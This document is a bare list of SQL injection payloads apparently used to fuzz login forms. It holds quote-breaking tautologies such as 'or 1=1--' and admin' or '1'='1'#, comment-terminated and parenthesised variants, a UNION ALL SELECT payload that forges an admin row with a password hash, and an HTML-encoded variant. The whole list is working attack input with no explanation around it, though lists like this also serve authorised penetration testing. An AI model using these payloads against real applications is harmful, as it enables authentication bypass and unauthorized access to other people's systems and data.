'
' or 1='1
' +or+1='1
"
" "
" or "" "
" or ""&"
" or ""*"
" or ""-"
" or ""^"
" or "a"="a
" or "x"="x
" or 0=0 #
" or 0=0 -- aassd
" or 1=1 or ""="
" or 1=1-- aassd 
" or true--
"&"
"' or 1 -- aassd'"
") or ("a"="a
") or ("x")=("x
") or true--
")) or (("x"))=(("x
"*"
"-"
"^"
"or "a"="a
"or 1=1%00
"or 1=1-- aassd
"or"="a'='a
' '
' or '' '
' or ''&'
' or ''*'
' or ''-'
' or ''^'
' or 'x'='x
' or true--
'&'
') or ('1')=('1')#
') or ('1')=('1')-- aassd s
') or ('x')=('x
') or true--
')) or (('x'))=(('x
')or('1'='1
')or('a'='a
'*'
'-'
'OR 1=1%00
'^'
'or 1=1 -- -
'or 1=1-- aassd s
'or''='
'or'='or'
'or'a'='a
'xor
1 or '1'='1' or 1=1
1 or '1'='1'=1
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
a'or' 1=1-- aassd 
admin" #
admin" --
admin" -- aassd
admin" Or "1"!="2
admin" or "1"="1
admin" or "1"="1"#
admin" or "1"="1"--
admin" or "1"="1"-- aassd
admin" or "1"="1"/*
admin" or 1=1
admin" or 1=1#
admin" or 1=1--
admin" or 1=1-- aassd
admin" or 1=1/*
admin") or "1"="1
admin") or "1"="1"#
admin") or "1"="1"--
admin") or "1"="1"-- aassd
admin") or "1"="1"/*
admin") or ("1"="1
admin") or ("1"="1"#
admin") or ("1"="1"--
admin") or ("1"="1"-- aassd 
admin") or ("1"="1"/*
admin"/*
admin"or 1=1 or ""="
admin' #
admin' --
admin' -- aassd
admin' Or '1'!='1
admin' or '1'='1
admin' or '1'='1' or 1=1
admin' or '1'='1'#
admin' or '1'='1'--
admin' or '1'='1'-- aassd
admin' or '1'='1'/*
admin' or 1=1
admin' or 1=1#
admin' or 1=1--
admin' or 1=1-- aassd
admin' or 1=1/*
admin') or '1'='1
admin') or '1'='1'#
admin') or '1'='1'--
admin') or '1'='1'-- aassd
admin') or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'#
admin') or ('1'='1'--
admin') or ('1'='1'-- aassd
admin') or ('1'='1'/*
admin'/*
admin'or 1=1 or ''='
or 1=1
or 1=1#
or 1=1-- 
or 1=1-- aassd
or 1=1/*
or true--
admin&#x27;or+1=&#x27;1